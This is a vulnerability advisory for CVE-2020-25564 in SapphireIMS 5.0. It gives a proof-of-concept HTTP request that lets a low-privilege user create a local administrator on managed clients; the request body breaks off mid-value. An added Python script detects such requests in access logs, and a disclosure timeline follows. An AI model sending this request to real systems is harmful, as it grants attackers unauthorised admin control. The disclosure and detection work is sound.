[CVE-2020-25564] SapphireIMS: Unprivileged user remote command execution (create local admin on clients)

Description

In SapphireIMS 5.0, a user with non-privileged credentials can create a local administrator account on any client by directly accessing the RemoteMgmtTaskSave (Automation Tasks) feature.

CVSS 3.0 Base Score

9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

Researcher

Tanoy Bose

POC

POST /SapphireIMS/RemoteMgmtTaskSave?mainmenu=yes HTTP/1.1
Host: 192.168.191.48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1619
Origin: http://192.168.191.48
Connection: close
Referer: http://192.168.191.48/SapphireIMS/TaskConfiguration.jsp?jobTypeId=2017&TaskName=User%20Management&SubTaskName=User%20Account%20Creation&Taskid=1002&mainmenu=yes&SelectedSite=1
Cookie: JSESSIONID=Ni+9V4wVLLkXCe5J0mirr2P4
Upgrade-Insecure-Requests: 1

applicationLogoutTypeOldUI=0&nodupSite=1&mainMenuID=yes&WMIIndex=0&WMITabName=WMI&paramReq1=1&TabList=1&JobIDList=10005&IsparamRequired=1&JobID=10005&TabList=Scheduler&SNMPShowHosts=0&WMIShowHosts=1&WBEMShowHosts=0&SSHShowHosts=0&SelectedSite=1&SelectedTabList=1%2C10005%7C%26%26%7C&param_List=10005%2C1%240%2C1%241%7C%3D%
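
An added detection example (not part of the original advisory or of SapphireIMS): it scans web access logs for POSTs to the RemoteMgmtTaskSave endpoint shown in the request above that originate outside an administrator network. The combined log format, the `admin_networks` range and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re

# Assumption: Apache/Tomcat "combined"-style access log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
SERVLET = "/sapphireims/remotemgmttasksave"  # endpoint named in the advisory

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    '10.0.5.10 - - [16/Sep/2020:10:01:02 +0000] "POST /SapphireIMS/RemoteMgmtTaskSave?mainmenu=yes HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.9.77 - - [16/Sep/2020:10:03:12 +0000] "GET /SapphireIMS/TaskConfiguration.jsp?jobTypeId=2017 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '10.0.9.77 - - [16/Sep/2020:10:03:40 +0000] "POST /SapphireIMS/RemoteMgmtTaskSave?mainmenu=yes HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '10.0.9.80 - - [16/Sep/2020:10:05:00 +0000] "POST /SapphireIMS/RemoteMgmtTaskSave HTTP/1.1" 403 0 "-" "-"',
]

def find_task_saves(lines, admin_networks):
    """Return POSTs to RemoteMgmtTaskSave sent from outside admin_networks."""
    nets = [ipaddress.ip_network(n) for n in admin_networks]
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Compare the path only: drop the query string, ignore case.
        path = m["target"].split("?", 1)[0].lower().rstrip("/")
        if path != SERVLET:
            continue
        try:
            src = ipaddress.ip_address(m["ip"])
        except ValueError:
            src = None  # hostname or garbage in the client field: still report
        if src is not None and any(src in n for n in nets):
            continue  # expected administrative traffic
        status = int(m["status"])
        findings.append({
            "time": m["ts"], "src": m["ip"], "status": status,
            # 2xx/3xx: the server accepted the task submission
            "severity": "high" if status < 400 else "info",
        })
    return findings

if __name__ == "__main__":
    for hit in find_task_saves(SAMPLE_LOG, ["10.0.5.0/24"]):
        print(hit)
```

Access logs do not record the role behind a session, so the network allowlist only approximates "non-privileged"; confirm each hit against the application's own user and task records.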

Vulnerability Tracker

Disclosure timelines

  • 07 May, 2020 - Vendor informed; failed
  • 16 Sept, 2020 - CERT/CC and CERT-In informed